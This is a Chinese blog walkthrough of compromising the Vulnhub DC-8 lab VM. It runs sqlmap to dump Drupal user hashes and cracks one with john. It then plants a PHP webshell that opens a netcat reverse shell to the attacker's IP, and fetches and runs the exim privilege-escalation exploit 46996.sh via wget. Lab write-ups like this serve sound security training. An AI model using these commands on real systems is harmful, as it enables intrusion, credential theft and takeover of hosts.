Vulnhub渗透靶机系列----DC8

最新推荐文章于 2024-06-14 09:32:35 发布
最新推荐文章于 2024-06-14 09:32:35 发布
阅读量112 收藏
点赞数
文章标签: 安全 网络 系统安全 linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67284865/article/details/132299162
版权

Vulnhub渗透靶机系列----DC8

下载地址

http://www.five86.com/downloads/DC-8.zip

https://download.vulnhub.com/dc/DC-8.zip

环境说明

dc8靶机:10.139.10.148
kali攻击机:10.139.10.152

信息收集

查看mac地址

在这里插入图片描述

探测存活主机

sudo netdiscover 10.139.10.0/24

在这里插入图片描述

对比mac地址得知ip为10.139.10.148

nmap扫端口

发现开放22端口和80端口

在这里插入图片描述

指纹探测

在这里插入图片描述

dirsearch目录扫描

在这里插入图片描述

漏洞利用

sql注入

在这里插入图片描述

手工判断发现存在sql注入

http://10.139.10.148/?nid=2 and 1=1
http://10.139.10.148/?nid=2 and 1=2
//通过返回界面不同,发现存在sql注入

原,不是,sqlmap启动!

sudo sqlmap -u "10.139.10.148/?nid=2" --dbs -batch

在这里插入图片描述

查看d7db库里的表

sudo sqlmap -u http://10.139.10.148/?nid=1 -D d7db --tables

在这里插入图片描述

查看users表的字段

sudo sqlmap -u http://10.139.10.148/?nid=1 -D d7db -T users --column

在这里插入图片描述

可以看到users表的字段里有name,pass两个值,查看这两个字段内容

sudo sqlmap -u http://10.139.10.148/?nid=1 -D d7db -T users -C name,pass --dump

在这里插入图片描述

admin  
$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john
$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

john爆破密码

john pass.txt

在这里插入图片描述

爆破出密码turtle

用之前扫目录的登录目录,/user/login用爆破出来的账户密码登录

webshell

登录成功后发现 add content,进去后可以写东西,但是没有php格式。
在这里插入图片描述

后来在contact us–webform–form setting,发现可写php格式

在这里插入图片描述

页面最下面点击保存,同时kali开启监听

<?php system("nc -e /bin/bash 10.139.10.152 4444");?>

在这里插入图片描述

然后再contact us写上信息提交

在这里插入图片描述

在这里插入图片描述

提权

python交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

exim4提权

find / -perm -4000 2>/dev/null

在这里插入图片描述

查看exim版本

exim --version

在这里插入图片描述

查寻exim漏洞,对比之前的版本信息,找合适的脚本

在这里插入图片描述

显示路径,复制到本地

searchsploit -x 46996.sh

cp /usr/share/exploitdb/exploits/linux/local/46996.sh 46996.sh

然后就是将这个脚本上传到靶机,这里有个点,直接上传运行会报错,由于windows系统下编辑然后上传到linux系统执行会导致的格式错误,要加上本地编辑查看文件类型:set ff=unix,按shift+:set ff=unix,再回车保存退出,然后再去上传执行的时候才不会报错

vim 46996.sh//按esc,再shirf加:  输入set ff=unix

在这里插入图片描述

kali开启服务,为了上传sh文件

python -m SimpleHTTPServer 80

验证开启

在这里插入图片描述

然后在反弹shell的靶机那远程wget下载,要在tmp目录下才有权限

wget http://10.139.10.152/46996.sh

增加文件权限

chmod 777 46996.sh

执行文件提权

./46996.sh -m netcat

拿到flag

在这里插入图片描述

一坨白大大
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3530
前言 这次练习的靶机vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2409
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 807
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
Vulnhub靶机:DC-1渗透详细过程
菜鸟学渗透
04-01 624
Vulnhub靶机:DC-1渗透详细过程
[Vulnhub靶机] DC-1
haosha。的博客
05-07 3980
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享)
Vulnhub渗透靶机系列----DC1
m0_67284865的博客
08-15 62
vulnhub详细解析步骤,vulnhub渗透靶机系列--DC1
vulnhub靶机渗透DC-1
RestoreJustice的博客
03-17 260
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里提权我们可以考虑爆破22端口或者内核提权(绝招,实在没办法在考虑),但在此之前我们可以尝试找找是否有一些拥有suid标识的命令,利用其提权。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.3.27。而且是几年前的,可以考虑使用MSF,上面应该集成了相关漏洞利用脚本,如果没有就得手工利用了。
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 2901
Vulnhub靶机渗透学习——DC-9
Vulnhub靶机渗透测试——DC-1
Cobra的博客
04-12 2474
Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描进行主机发现 nmap 192.168.189.0/24 2、发现IP为192.168.189.172主机开放80和22等端口,访问其80端口 三、漏洞利用 1、发现该站点是由Drupal搭建,利用msf进行漏洞利用 use exploit/unix/webapp/drupal_drupalgedd
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
等保测评和安全运维
weixin_64392888的博客
06-11 664
通过将等保测评的标准和流程融入日常的安全运维工作中,企业可以更有效地识别和应对网络安全威胁,构建起一个全面、动态的网络安全防护体系。为了应对这些挑战,企业不仅要实施有效的安全运维措施,还需要通过等保测评确保其信息系统符合国家的安全标准。等保测评提供了一套标准化的安全要求,安全运维团队可以根据这些要求,实施相应的安全措施,如加强访问控制、数据加密、网络安全防护等。通过等保测评,企业可以识别信息系统的安全风险,并根据测评结果制定或调整安全策略,确保安全措施与企业的实际需求相匹配。
《软件定义安全》之六:SDN和NFV安全实践
大龄IT民工
06-11 1411
DDoS检测清洗应用ADS APP的设计思路:借助安全控制平台中流相关的组件,从SDN控制器中获得相应的流量,并根据抗DDoS应用订阅的恶意流特征进行检测,发现恶意流量后,应用可根据细粒度的检测判断是否出现恶意攻击。如是,则下发实时清洗的流指令,即可将恶意流量牵引到清洗设备ADS上。过程如下:➊注册。启动阶段,ADS设备和ADS APP均向安全控制平台注册,提供自己的基本信息,如类型、位置和能力等。➋订阅。为获取并检查可疑流,ADS APP向安全控制器发送订阅。➌流统计获取和检查。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 429
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 966
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值